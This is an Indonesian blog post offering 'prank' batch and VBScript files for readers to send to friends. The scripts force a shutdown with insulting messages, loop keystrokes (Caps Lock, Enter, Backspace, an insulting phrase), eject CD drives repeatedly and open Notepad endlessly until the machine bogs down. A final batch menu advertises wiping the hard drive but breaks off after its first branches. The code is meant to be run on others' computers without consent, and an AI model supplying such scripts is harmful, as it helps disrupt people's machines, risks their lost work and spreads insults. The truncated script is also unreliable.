Daftar Artikel Menarik

Trik : Menjahili Teman Dengan Javascript

Diposting oleh Sandi Asyuri on Kamis, 27 Desember 2012


kali ini palingcerdas akan share gimana caranya menjahili teman kita menggunakan javascript,script dibawah ini bisa anda gunakan untuk menjahili teman anda tapi ingat jangan keterlaluan yah...
nih langsung aja liat javascriptnya,

1). memberi sedikit pesan dan shutdown komputer teman anda
ketik :
Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save As menggunakan Extension .BAT lalu kiri me teman anda
Code:
Contoh : apasaja.bat

2). Menyalakan tombol Caps lock secara simultan
ketik :
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save As .VBS trus kirim ke teman anda
Code:
contoh : apasaja.VBS

3). buka/tutup CD drive secara terus menerus
ketik :
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save As Save As .VBS trus kirim ke teman anda 

4). yang ini script fungsinya supaya teken enter secara simultan 
ketik :
Code :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save As Save As .VBS trus kirim ke teman anda 

5). yang ini Fungsinya untuk membuka notepad, kemudian akan mengetik pesan kita secara otomatis di notepad.
ketik :
Code:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save As Save As .VBS trus kirim ke teman anda 

6). Membuat script vbs ini menjalankan BACKSPACE secara simultan
ketik :
Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save As Save As .VBS trus kirim ke teman anda 

7). Hack keyboard sehingga temen lu dipaksa ngetik " u are a gay" secara simultan
ketik :
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a gay"
loop
Save As Save As .VBS trus kirim ke teman anda 

8). Buka Notepad secara terus menerus
ketik :
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save As Save As .BAT trus kirim ke teman anda

9). Script BATCH yang ini bakal munculin 5 pilihan yang harus temen kalian diantaranya adalah
1. shutdown
2. restart
3. hapus hard drive 
4. Net send
5. Menampilkan pesan, kemudian shutdown

ketik :
Code:
@echo off
title The end of the world
cd C:\
:menu
cls
echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri...
pause
echo pilih nama cwe yang lu suka =P :
echo 1. datanya bakal ilang lho.
echo 2. komputer nya corrupt lho
echo 3. heheh no comment deh klo yang ini
echo 4. mau mati pake jalan ini?
echo 5. bye bye...
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

nah,script script di atas bisa anda kreasikan lagi agar lebih jail lagi,dan juga bisa diedit edit lagi,


Share this :